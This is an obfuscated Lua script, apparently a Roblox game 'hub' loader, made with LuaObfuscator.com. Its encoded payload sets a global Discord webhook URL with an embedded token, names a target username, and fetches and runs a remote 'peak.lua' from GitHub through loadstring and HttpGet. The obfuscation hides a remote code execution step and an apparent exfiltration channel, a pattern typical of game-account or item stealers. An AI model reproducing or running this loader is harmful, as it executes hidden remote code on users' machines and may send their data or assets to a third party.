--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v68=0;while true do if (v68==0) then v19=v0(v3(v30,1,1));return "";end end else local v69=v2(v0(v30,16));if v19 then local v75=v5(v69,v19);v19=nil;return v75;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/((5 -3)^(v32-((879 -(282 + 595)) -1))))%((3 -1)^(((v33-(2 -(1638 -(1523 + 114)))) -(v32-(620 -(499 + 56 + 64)))) + (932 -(857 + 74)))) ;return v70-(v70%(569 -(367 + 201))) ;else local v71=2^(v32-(928 -(214 + 713))) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or ((0 -0) + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + 4 + 0 ;return (v40 * (3720433 + (24134629 -11077846))) + (v39 * (66493 -(892 + 65))) + (v38 * ((1119 -509) -354)) + v37 ;end local function v24()local v41=(788 -(145 + 293)) -(87 + 263) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==1) then v44=181 -(67 + 113) ;v45=(v20(v43,1 + (430 -(44 + 386)) ,49 -29 ) * ((2 + 0)^(127 -95))) + v42 ;v41=954 -(802 + 150) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1;end if (v41==(5 -2)) then if (v46==(0 + 0)) then if (v45==(997 -(915 + 82))) then return v47 * 0 ;else v46=2 -1 ;v44=0 + 0 ;end elseif (v46==((1155 + 1536) -644)) then return ((v45==(1187 -(1069 + 118))) and (v47 * ((2 -1)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(178 + 845) ) * (v44 + (v45/((3 -1)^(52 + 0)))) ;end if (v41==(793 -((650 -282) + 423))) then v46=v20(v43,65 -44 ,49 -(10 + 8) );v47=((v20(v43,32)==1) and  -(3 -2)) or (443 -(416 + (1512 -(998 + 488)))) ;v41=(3 + 6) -6 ;end end end local function v25(v48)local v49=0 + 0 ;local v50;local v51;while true do if (v49==(774 -(201 + 571))) then v51={};for v76=1139 -(116 + 1022) , #v50 do v51[v76]=v2(v1(v3(v50,v76,v76)));end v49=12 -9 ;end if (v49==(886 -(261 + 624))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=7 -5 ;end if (v49==3) then return v6(v51);end if (v49==((0 -0) -0)) then v50=nil;if  not v48 then local v92=859 -(814 + 45) ;while true do if (v92==(0 -(1080 -(1020 + 60)))) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=(1424 -(630 + 793)) + 0 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(71 -(64 + 6))) then v55=nil;v56=nil;v52=2;end if (v52==(1904 -(106 + 1794))) then while true do if (v53~=(1 + 0)) then else local v95=0;while true do if (v95==0) then v56=nil;v57=nil;v95=1 + 0 ;end if (1~=v95) then else v53=5 -3 ;break;end end end if (v53==(0 -0)) then v54=114 -(4 + 110) ;v55=nil;v53=585 -(57 + 527) ;end if (v53==3) then v60=nil;while true do local v97=1427 -(41 + 1386) ;while true do if (v97==1) then if ((104 -(17 + 86))==v54) then local v104=0;while true do if (v104~=2) then else v54=2 + 0 ;break;end if (v104==(1 -0)) then for v116=2 -1 ,v59 do local v117=0;local v118;local v119;local v120;local v121;while true do if (v117~=(166 -(122 + 44))) then else v118=0;v119=nil;v117=1;end if (2~=v117) then else while true do if ((1 -0)==v118) then v121=nil;while true do if ((3 -2)==v119) then if (v120==(1 + 0)) then v121=v21()~=(0 + 0) ;elseif (v120==2) then v121=v24();elseif (v120==(5 -2)) then v121=v25();end v60[v116]=v121;break;end if (v119==(65 -(30 + 35))) then local v176=0 + 0 ;local v177;while true do if (v176~=(1257 -(1043 + 214))) then else v177=0;while true do if (v177==(0 -0)) then local v185=0;while true do if (v185==(1213 -(323 + 889))) then v177=1;break;end if (v185~=0) then else v120=v21();v121=nil;v185=1;end end end if (v177==1) then v119=1;break;end end break;end end end end break;end if (v118==(0 -0)) then v119=0;v120=nil;v118=581 -(361 + 219) ;end end break;end if (v117==1) then v120=nil;v121=nil;v117=2;end end end v58[323 -(53 + 267) ]=v21();v104=2;end if (v104~=0) then else v59=v23();v60={};v104=1 + 0 ;end end end break;end if (v97==(413 -(15 + 398))) then if (v54~=(982 -(18 + 964))) then else local v105=0;while true do if (v105==(3 -2)) then local v114=0 + 0 ;while true do if (v114==0) then v57={};v58={v55,v56,nil,v57};v114=1 + 0 ;end if (v114~=1) then else v105=128 -(116 + 10) ;break;end end end if (v105==(1 + 1)) then v54=739 -(542 + 196) ;break;end if (v105~=0) then else local v115=0;while true do if (0==v115) then v55={};v56={};v115=1;end if (v115~=(1 -0)) then else v105=1 + 0 ;break;end end end end end if (v54==(2 + 0)) then local v106=0 + 0 ;local v107;while true do if (v106~=0) then else v107=0;while true do if (v107==(0 -0)) then local v162=0;while true do if (v162~=(0 -0)) then else for v169=1,v23() do local v170=1551 -(1126 + 425) ;local v171;local v172;while true do if (v170==0) then v171=405 -(118 + 287) ;v172=nil;v170=1;end if ((3 -2)==v170) then while true do if (v171~=(1121 -(118 + 1003))) then else v172=v21();if (v20(v172,1,1)==0) then local v178=0;local v179;local v180;local v181;local v182;local v183;local v184;while true do if (v178==(0 -0)) then v179=0;v180=nil;v178=1;end if (v178==2) then v183=nil;v184=nil;v178=380 -(142 + 235) ;end if (v178==(4 -3)) then v181=nil;v182=nil;v178=2;end if (v178==3) then while true do if (1==v179) then local v186=0;while true do if (v186~=(1 + 0)) then else v179=2;break;end if (0==v186) then v182=nil;v183=nil;v186=1;end end end if (v179~=(977 -(553 + 424))) then else local v187=0;while true do if (v187==0) then v180=0 -0 ;v181=nil;v187=1;end if (v187==1) then v179=1;break;end end end if (2==v179) then v184=nil;while true do if (v180~=0) then else local v188=0 + 0 ;while true do if ((1 + 0)==v188) then v180=1 + 0 ;break;end if (v188~=(0 + 0)) then else v181=0 + 0 ;v182=nil;v188=2 -1 ;end end end if (1==v180) then local v189=0;local v190;while true do if (v189==(0 -0)) then v190=0 -0 ;while true do if (0~=v190) then else local v201=0 + 0 ;while true do if (v201==(4 -3)) then v190=754 -(239 + 514) ;break;end if (v201==(0 + 0)) then v183=nil;v184=nil;v201=1330 -(797 + 532) ;end end end if (v190==1) then v180=2 + 0 ;break;end end break;end end end if (v180==2) then while true do if (v181==(0 + 0)) then local v191=0 -0 ;local v192;local v193;while true do if (v191~=1) then else while true do if (v192==0) then v193=1202 -(373 + 829) ;while true do if (v193~=0) then else v182=v20(v172,2,3);v183=v20(v172,735 -(476 + 255) ,6);v193=1;end if (v193==(1131 -(369 + 761))) then v181=1 + 0 ;break;end end break;end end break;end if (v191==0) then v192=0;v193=nil;v191=1 -0 ;end end end if (v181==(5 -2)) then if (v20(v183,241 -(64 + 174) ,1 + 2 )==1) then v184[5 -1 ]=v60[v184[340 -(144 + 192) ]];end v55[v169]=v184;break;end if (v181==(218 -(42 + 174))) then local v195=0 + 0 ;local v196;while true do if (v195~=(0 + 0)) then else v196=0 + 0 ;while true do if (0==v196) then local v202=1504 -(363 + 1141) ;while true do if (v202==(1580 -(1183 + 397))) then if (v20(v183,1,2 -1 )==1) then v184[2]=v60[v184[2]];end if (v20(v183,2 + 0 ,2)==1) then v184[3 + 0 ]=v60[v184[3]];end v202=1;end if (v202~=(1976 -(1913 + 62))) then else v196=1 + 0 ;break;end end end if ((2 -1)~=v196) then else v181=1936 -(565 + 1368) ;break;end end break;end end end if (v181~=1) then else local v197=0;local v198;while true do if (0~=v197) then else v198=0;while true do if (v198==(3 -2)) then v181=2;break;end if (v198==0) then local v203=1661 -(1477 + 184) ;while true do if (v203==(1 -0)) then v198=1;break;end if (0==v203) then v184={v22(),v22(),nil,nil};if (v182==(0 -0)) then local v208=0;local v209;local v210;while true do if (v208==0) then v209=0;v210=nil;v208=2 -1 ;end if (v208==(305 -(244 + 60))) then while true do if ((0 + 0)==v209) then v210=476 -(41 + 435) ;while true do if (v210==0) then v184[3]=v22();v184[1005 -(938 + 63) ]=v22();break;end end break;end end break;end end elseif (v182==(1 + 0)) then v184[1128 -(936 + 189) ]=v23();elseif (v182==(1 + 1)) then v184[3]=v23() -(2^(1629 -(1565 + 48))) ;elseif (v182==3) then local v213=0 + 0 ;local v214;local v215;while true do if (v213==1) then while true do if (v214~=0) then else v215=0;while true do if (v215==0) then v184[1141 -(782 + 356) ]=v23() -((269 -(176 + 91))^16) ;v184[10 -6 ]=v22();break;end end break;end end break;end if (v213~=(0 -0)) then else v214=1092 -(975 + 117) ;v215=nil;v213=1;end end end v203=1876 -(157 + 1718) ;end end end end break;end end end end break;end end break;end end break;end end end break;end end break;end end end for v173=1,v23() do v56[v173-(1 + 0) ]=v28();end v162=1;end if (v162~=(3 -2)) then else v107=1;break;end end end if (v107~=1) then else return v58;end end break;end end end v97=3 -2 ;end end end break;end if (2~=v53) then else local v96=1018 -(697 + 321) ;while true do if (v96==(2 -1)) then v53=3;break;end if (v96~=(0 -0)) then else v58=nil;v59=nil;v96=2 -1 ;end end end end break;end if (v52==0) then v53=0;v54=nil;v52=1;end if ((2 + 1)==v52) then v59=nil;v60=nil;v52=6 -2 ;end if (v52==2) then v57=nil;v58=nil;v52=7 -4 ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (v64==1) then v67=v61[3];return function(...)local v78=v65;local v79=v66;local v80=v67;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v93=0,v86 do if (v93>=v80) then v84[v93-v80 ]=v85[v93 + 1 ];else v88[v93]=v85[v93 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v94=0;while true do if (v94==1) then if (v91<=5) then if (v91<=2) then if (v91<=0) then v88[v90[2]]=v63[v90[3]];elseif (v91==1) then local v122=v90[2];local v123=v88[v90[3]];v88[v122 + 1 ]=v123;v88[v122]=v123[v90[4]];else v88[v90[2]]();end elseif (v91<=3) then v82=v90[3];elseif (v91>4) then local v127;local v128,v129;local v130;local v131;v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v131=v90[2];v130=v88[v90[3]];v88[v131 + 1 ]=v130;v88[v131]=v130[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v131=v90[2];v128,v129=v81(v88[v131](v13(v88,v131 + 1 ,v90[3])));v83=(v129 + v131) -1 ;v127=0;for v159=v131,v83 do v127=v127 + 1 ;v88[v159]=v128[v127];end v82=v82 + 1 ;v90=v78[v82];v131=v90[2];v88[v131]=v88[v131](v13(v88,v131 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v82=v90[3];else do return;end end elseif (v91<=8) then if (v91<=6) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91>7) then v88[v90[2]][v90[3]]=v90[4];else local v146=0;local v147;local v148;local v149;local v150;while true do if (v146==0) then v147=v90[2];v148,v149=v81(v88[v147](v13(v88,v147 + 1 ,v90[3])));v146=1;end if (v146==2) then for v166=v147,v83 do v150=v150 + 1 ;v88[v166]=v148[v150];end break;end if (v146==1) then v83=(v149 + v147) -1 ;v150=0;v146=2;end end end elseif (v91<=9) then v88[v90[2]]=v90[3];elseif (v91==10) then local v151=0;local v152;while true do if (v151==0) then v152=v90[2];v88[v152]=v88[v152](v13(v88,v152 + 1 ,v83));break;end end else v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v63[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v82=v90[3];end v82=v82 + 1 ;break;end if (v94==0) then v90=v78[v82];v91=v90[1];v94=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130373931383931343730363438313231342F714B51483070452O346A313064464A30765A716A4158573336793541435F682D756A6678772D6A526D6F3361354E6356396B72796C4C67494A79494238334265454B6978030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103083O00557365726E616D65030C3O006661757A616E64696E69313003073O004875624E616D6503083O00576174657250737800163O0012093O00013O0026063O000D000100020004033O000D000100122O000100033O00300500010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026063O0001000100010004033O0001000100122O000100033O00300B0001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00043O00017O00",v9(),...);end
